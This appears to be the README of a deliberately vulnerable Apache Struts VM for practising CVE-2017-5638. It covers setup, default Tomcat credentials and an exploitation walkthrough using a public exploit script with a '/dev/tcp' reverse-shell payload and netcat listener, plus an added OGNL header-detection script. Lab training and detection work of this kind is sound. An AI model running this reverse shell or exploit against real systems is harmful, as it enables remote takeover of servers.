Tobey123/vuln-struts2-vm

A Vulnerable Apache Struts Application

Confirmed Vulnerabilities

CVE            Description                                     URL
2017-5638      Remote Command Vulnerability in Apache Struts   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

Requirements:

Setup

$ git clone https://github.com/evolvesecurity/vuln-struts2-vm.git
$ cd vuln-struts2-vm

Build Virtual Machine

IMPORTANT: The VM currently uses "public networking" (see the Vagrantfile), which exposes the vulnerable machine to the LAN it is bridged onto. Use this only on a secure, isolated LAN; otherwise switch the Vagrantfile to "private networking".

See: https://www.vagrantup.com/docs/virtualbox/networking.html

$ vagrant up # this will bring up and provision your machine
$ vagrant ssh
# to get the IP of your machine if unknown:
ubuntu@strut $ ip route

Verification:

You should now visit http://IP:8080 to see if tomcat8 is working. If the URL is unavailable, try http://IP:8080/manager with the credentials "tomcat" and "tomcat".

Exploitation:

Open a terminal, then run the command below to start a TCP listener.

$ nc -nvlp 5556

Open a separate terminal, then run the commands below to carry out the exploit with a reverse shell. Replace IP-TARGET with the target's IPv4 address and IP-LISTENER with your listening host's IPv4 address.

# download exploit from https://www.exploit-db.com/exploits/41570/
# or use searchsploit
$ searchsploit Struts #optional
$ cp /path/to/linux/webapps/41570.py exploit.py
$ python exploit.py "http://IP-TARGET:8080/http-session/hello.action" "bash -i >& /dev/tcp/IP-LISTENER/5556 0>&1"

It may be necessary to modify exploit.py in order to pass in the command you want.

One option to confirm your exploit is to simply set up a netcat listener and have the shell connect back to it.
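If you run this lab to exercise monitoring as well as the exploit, the following added example (not part of this repository) shows how the attack traffic can be detected. CVE-2017-5638 is triggered by an OGNL expression placed in the Content-Type header, which the Jakarta multipart parser evaluates while building an error message; a legitimate Content-Type never contains OGNL syntax. The script parses constructed sample request heads (the host, path and header values are made up) and flags those whose Content-Type or Content-Disposition carries OGNL markers.

```python
import re

# Markers of OGNL expression injection in a header value. None of these
# ever appears in a well-formed MIME type, so any match is suspicious.
OGNL_MARKERS = (
    r"%\{",             # OGNL expression start
    r"\$\{",            # alternate expression syntax
    r"#_memberAccess",  # sandbox context reference used by public exploits
    r"#context",        # OGNL context access
)
OGNL_RE = re.compile("|".join(OGNL_MARKERS), re.IGNORECASE)

def parse_headers(raw):
    """Return (request_line, {header-name-lowercased: value}) for one raw HTTP request head."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:          # blank line ends the header block
            break
        if ":" not in line:   # skip malformed header lines
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def is_struts_ognl_attempt(raw):
    """True if the Content-Type or Content-Disposition header carries OGNL markers."""
    _, headers = parse_headers(raw)
    return any(OGNL_RE.search(headers.get(name, ""))
               for name in ("content-type", "content-disposition"))

def scan_requests(raw_requests):
    """Return the request line of every request flagged as a CVE-2017-5638 attempt."""
    return [parse_headers(raw)[0] for raw in raw_requests if is_struts_ognl_attempt(raw)]

# Constructed samples: a benign multipart upload, a benign GET, and a request
# whose Content-Type carries an OGNL expression (the expression body is elided).
SAMPLES = [
    "POST /http-session/hello.action HTTP/1.1\r\nHost: 10.0.0.5:8080\r\n"
    "Content-Type: multipart/form-data; boundary=----abc123\r\n\r\n",
    "GET /http-session/hello.action HTTP/1.1\r\nHost: 10.0.0.5:8080\r\n\r\n",
    "POST /http-session/hello.action HTTP/1.1\r\nHost: 10.0.0.5:8080\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#_memberAccess=...)}\r\n\r\n",
]

if __name__ == "__main__":
    for request_line in scan_requests(SAMPLES):
        print("ALERT CVE-2017-5638 pattern:", request_line)
```

The same check can be run over a web proxy or IDS capture of the lab traffic; the patched Struts releases reject such Content-Type values before the multipart parser sees them.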

Troubleshooting:

If you wish to SSH directly into your VM without using the vagrant ssh command, you need to set a password for the ubuntu user. First, SSH into the VM using vagrant ssh, then reset the password with passwd ubuntu.

Credits:

The source code for the Apache Struts2 applications was taken from https://github.com/apache/struts-examples. The pom.xml files were modified slightly in order to downgrade Apache Struts2 to a vulnerable version.

About

An Ubuntu 16.04 VM vulnerable to CVE-2017-5638
